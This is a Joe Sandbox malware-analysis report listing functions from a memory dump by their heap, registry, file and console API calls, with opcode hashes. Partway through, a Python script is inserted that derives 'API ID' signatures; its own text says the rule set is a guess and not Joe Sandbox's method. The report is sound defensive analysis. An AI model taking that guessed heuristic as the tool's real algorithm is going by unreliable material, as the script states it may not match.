• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: FreeHeap$ProcessVirtual_setjmp3
• String ID:
• API String ID: 2613391085-0
APIs
• longjmp.MSVCRT(001D0A30,00000001,?,?,001ABFD6,?,?,?,?,?,?,?,?), ref: 001B64D4
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
  • Part of subcall function 001A72EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00191028,?,?,?,001AF12E,001BCA50,00000018,001A1E7C,00000000,00000000,001AACE0,00000000,00000000,?,00000104,?), ref: 001A7314
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,001ABFD6), ref: 001B646C
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,001ABFD6), ref: 001B6474
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,001ABFD6), ref: 001B64B6
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
• String ID:
• API String ID: 129137517-0
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,001BCD20,0000001C,001B58DF), ref: 001B62E6
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,001BCD20,0000001C,001B58DF), ref: 001B6301
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 001B6340
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B635D
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: QueryValue$ErrorLastOpen
• String ID:
• API String ID: 4270309053-0
                                                                                                                                                                                                                          • Opcode ID: a23f13e170dee7dcbf73b8a8e2d01a89f2007ea2fd9ebe19a5c61ff1b7463768
                                                                                                                                                                                                                          • Instruction ID: 9f792ea56f60114add34af54883599d8fd83bc16fea84dc3393887b8423c8eb6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a23f13e170dee7dcbf73b8a8e2d01a89f2007ea2fd9ebe19a5c61ff1b7463768
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33212AB1D01219AFEB109F999C819EEBBFCFB68750F54416AE905B3250D7758D00CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BA034
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,0019234C,0020005D), ref: 001BA078
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BA0AA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,0019234C,0020005D), ref: 001BA0C2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3442494845-0
                                                                                                                                                                                                                          • Opcode ID: 847ceae0350eb0496a40a3c937951ff681deb3434803a18536a0bcdb97172826
                                                                                                                                                                                                                          • Instruction ID: 6eed45c912936c18e204108d0b559e2ab82d8ab8df717f57a3860fe22e715f50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 847ceae0350eb0496a40a3c937951ff681deb3434803a18536a0bcdb97172826
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D216571A0121AABDB24DFA9DD899EFBBF8EF58304F4401AAF505D3141E734DE448A92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A2977
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A2987
                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0019E559,?,?,00000000,?), ref: 001A29FF
                                                                                                                                                                                                                          • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0019E559,?,?,00000000,?), ref: 001A2A09
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4273384694-0
                                                                                                                                                                                                                          • Opcode ID: 67f8fa504604f084b8958b78a422776256563d9c34a39c53891182c5fe805d72
                                                                                                                                                                                                                          • Instruction ID: 09f428f4ea1d5e4d4301addf92b1ab2aa7cc9ccd88174dfc38b081f2fe342817
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67f8fa504604f084b8958b78a422776256563d9c34a39c53891182c5fe805d72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C111D63A901536BF87255B7C8A0897BBB6CFF02758B560211E801D7950D775ED50E6E0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC56B
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 001BC5A5
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BC5BD
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 001BC5DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029679093-0
                                                                                                                                                                                                                          • Opcode ID: 31fe6db454935f7ea3f585c6832fa74b0c5ca7854c7eebbedb409940269169bd
                                                                                                                                                                                                                          • Instruction ID: f949e50dbd71561a78aa60888f3c54c0c09fe04f3eb685288127fd8d65eb063f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31fe6db454935f7ea3f585c6832fa74b0c5ca7854c7eebbedb409940269169bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11213072B012096BDF20DBA5DC89BEFBBFCEF44344F140569E505D3141E774EA848AA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cbfb7ac4dc2640e610864cff9c009f8d6934c226aff569e25a42d18fea585865
                                                                                                                                                                                                                          • Instruction ID: c11aec9e24be745007f5f19b6953d5a56df016daf61a9a43ec7862e762534406
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbfb7ac4dc2640e610864cff9c009f8d6934c226aff569e25a42d18fea585865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911E739202604ABDB269B649E99FEF7759EF89724F14411AF802C71D0DB70DE81C792
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B9822
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B92EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001B982A
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B9841
                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001B986E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                          • Opcode ID: 5666937bdc28407e44df74684e1587bc2567630e5b8da1fda0939ccd504f9d71
                                                                                                                                                                                                                          • Instruction ID: 1bf6b3d96f262f52db57f78c5d86c86f41a0329389131fed14acecb5a5b95786
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5666937bdc28407e44df74684e1587bc2567630e5b8da1fda0939ccd504f9d71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD11E731201208AFDF15AB71EC4AEFF3B59EF86B15F10402AF50586151DB74CC82CB61
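The "API ID" field in each Similarity block above is a word signature derived from the function's imported API calls, which is what lets an analyst group the loader's functions by the Win32/CRT API set they use rather than by address. The page does not document how Joe Sandbox builds that field, so the script below is an added example, not Joe Sandbox's own code: it parses the "APIs" listings exactly as they appear in this section (the sample input is copied from the four listings above) and applies a heuristic of my own (drop C++ mangled exports, strip a trailing A/W suffix, split CamelCase into words, drop the "Get" word, group words by call count, alphabetical inside a group, groups joined by "$") that reproduces the four visible API IDs. The rule set, the `SAMPLE_BLOCKS` keys and every function name are assumptions for illustration; the heuristic may not match entries whose call lists are not shown here.

```python
"""
Parse the "APIs" listings of Joe Sandbox function entries (the format used
in this report) and derive a word-frequency signature per function, so that
functions calling the same Win32/CRT API set can be grouped across dumps.

Assumption: the page does not document how Joe Sandbox computes its
"API ID" field. The heuristic below reproduces the four API IDs whose call
lists are visible in this section; it is an illustration, not Joe Sandbox's
implementation.
"""
import re
from collections import Counter

# Constructed sample input: four "APIs" listings copied from this section,
# keyed (my choice) by the ref address of the first call in each listing.
SAMPLE_BLOCKS = {
    "001BA034": """\
• memset.MSVCRT ref: 001BA034
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,0019234C,0020005D), ref: 001BA078
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BA0AA
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,0019234C,0020005D), ref: 001BA0C2""",
    "001A2977": """\
• wcstol.MSVCRT ref: 001A2977
• wcstol.MSVCRT ref: 001A2987
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0019E559,?,?,00000000,?), ref: 001A29FF
• lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0019E559,?,?,00000000,?), ref: 001A2A09""",
    "001BC56B": """\
• memset.MSVCRT ref: 001BC56B
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 001BC5A5
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BC5BD
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 001BC5DA""",
    "001B9822": """\
• _get_osfhandle.MSVCRT ref: 001B9822
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B92EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001B982A
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B9841
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001B986E""",
}

# One call line: optional "Part of subcall function XXXX:" marker, then
# Name.MODULE, optional "(args)", optional comma, then "ref: ADDRESS".
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_.-]+?)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$"
)


def parse_apis(block: str):
    """Return [(name, module, ref)] for every call line in one APIs listing."""
    calls = []
    for raw in block.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            calls.append((m["name"], m["module"], m["ref"]))
    return calls


def api_words(name: str):
    """Split one API name into signature words (heuristic, see module docstring)."""
    if name.startswith("?"):                       # C++ mangled export, e.g. ??_V@YAXPAX@Z
        return []
    name = re.sub(r"(?<=[a-z])[AW]$", "", name)    # lstrcmpW -> lstrcmp, DeleteFileW -> DeleteFile
    words = re.findall(r"[A-Z][a-z0-9]*", name)    # CamelCase -> ["Write", "File"]
    if not words:                                  # CRT style names: memset, _get_osfhandle
        return [name]
    return [w for w in words if w != "Get"]        # "Get" carries no information


def api_id(names):
    """Word signature: words grouped by call count, most-called first, '$' between groups."""
    counts = Counter(w for n in names for w in api_words(n))
    groups = {}
    for w, c in counts.items():
        groups.setdefault(c, []).append(w)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


def signatures(blocks):
    """function key -> signature, for every listing in blocks."""
    return {fn: api_id([c[0] for c in parse_apis(text)]) for fn, text in blocks.items()}


def group_by_signature(blocks):
    """signature -> [function keys]; functions sharing a key use the same API word set."""
    out = {}
    for fn, sig in signatures(blocks).items():
        out.setdefault(sig, []).append(fn)
    return out


if __name__ == "__main__":
    for sig, fns in group_by_signature(SAMPLE_BLOCKS).items():
        print(f"{sig:45s} {', '.join(fns)}")
```

Feeding the listings of several dumps into `group_by_signature` shows which functions share an API word set; the two `memset$Drive...` entries above differ only in `GetFullPathNameW` versus `GetVolumePathNameW`, which the signature keeps distinct because the word sets differ, while the `Opcode ID` and `Instruction Fuzzy Hash` fields are the ones to compare when the question is whether the code bytes themselves match.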
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,001B9962,00000000,?,00000000,001ACF94,00000000,?), ref: 0019727F
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00197286
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001972AF
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001972B6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 8b199f8ab3ebd53db5c904b020ec64389b5c8757d8cb0f55227f80dd8eacd576
                                                                                                                                                                                                                          • Instruction ID: 24bef94575211d6d7bc9548839c37bb323771ff7d848ef03cef3b78c8f7b7285
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b199f8ab3ebd53db5c904b020ec64389b5c8757d8cb0f55227f80dd8eacd576
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11E73162A2408BCF24AF79D805B367BA1EF96315F24484EF497CB6D1CB34D842D761
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00196231,00000000,00000000,91B40133), ref: 0019630C
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00196313
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                          • Opcode ID: 7d646b57a7bb89f5f60f697193054a99d53d5c50a4dff434a1921396024fb826
                                                                                                                                                                                                                          • Instruction ID: 62f69c5955f935ad432defab01f07c79675598903f6aee49093de8473be252dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d646b57a7bb89f5f60f697193054a99d53d5c50a4dff434a1921396024fb826
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED11443670312197CE289B255824B3F771ABFC0B11F5A001AE80A9BA90CF229D43D6B2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0019BDB3,00000000,?), ref: 0019DD37
                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0019DD3E
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0019DD53
                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0019DD5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2549470565-0
                                                                                                                                                                                                                          • Opcode ID: 2a6c1424777bc3238b4d45fce3e892408b20db11850ed6413b1dc791061e3eb3
                                                                                                                                                                                                                          • Instruction ID: 13ccb6b8e9f32b9ff3215516034f1484eee7ef257c71e5d83479bb4c3bf1cf4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6c1424777bc3238b4d45fce3e892408b20db11850ed6413b1dc791061e3eb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D801B176202311ABCB219BA4FC88E9A77A9EF94756FA00422F50AC7490DB31DC84C7A1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84B9
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84C6
                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84EA
                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033415088-0
                                                                                                                                                                                                                          • Opcode ID: dbc89c114bcb4ff271fad94dddaf5fbe13bcc826b21b329df944d0dda4d8e010
                                                                                                                                                                                                                          • Instruction ID: 58fee725351b02058619ee0b7ef8d36232f6c461039ee45830cb425b0928ebb9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbc89c114bcb4ff271fad94dddaf5fbe13bcc826b21b329df944d0dda4d8e010
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8014F71A02119AF8B04EBB89C88AFFB7ECEF0E710B40012AF916E2150EB249D45C765
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A0060: wcschr.MSVCRT ref: 001A006C
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 001A5678
                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 001A568C
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 001A56A2
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B122B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
